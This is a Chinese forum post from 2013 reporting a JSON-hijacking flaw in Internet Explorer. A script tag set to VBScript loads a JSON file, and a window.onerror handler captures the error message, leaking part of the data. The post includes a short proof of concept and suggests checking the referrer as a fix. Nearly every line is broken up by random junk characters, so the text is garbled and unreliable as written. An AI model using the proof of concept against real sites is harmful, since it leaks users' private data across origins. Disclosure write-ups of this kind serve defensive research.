简要描述:
2 t4 Z. }+ S: q3 Z1 \+ Z8 ~/ {6 P3 E1 }/ T8 d9 `, [2 }4 v
由于某些资源容器对数据处理不当导致json劫持漏洞.
& N. M2 U- p9 T! T6 }% D详细说明:2 |2 p* |: }9 S# O. m- J
由于ie支持vbscript,所以script元素可以指定成vbscript语言:, Q! f! g# o4 u! |% T) i0 f3 g
<script language=vbscript></script>& g+ W p$ T4 ], d( e5 t
7 ]9 i! h& m/ Y- |: W) r' \) `
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.8 i0 K% D9 n4 D& a! e
漏洞证明:) G$ I& C7 h# ? u% {% Q
<script>+ {, O8 C6 l+ L" Q) M
window.onerror=function(_){0 g% u( k& H& @& r
alert(_)
* ^6 d/ }" I5 g7 e# Z}; X* j$ T+ |4 u7 J
</script>8 j% R6 [& ]( Y- D
<script language=vbscript src=1.json></script>6 |3 @) z: R" J! K/ \$ E
" H# }7 j4 `+ w" E4 q5 l! w2 q0 J ( B& e1 x; c2 k
1.json:/ S3 k5 V4 P' _9 b) G
[{"name":"sogili","age":19}]& M E9 ]6 N9 m {' e' v
修复方案:
9 W) E. s! e! ~6 P# B+ ?网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对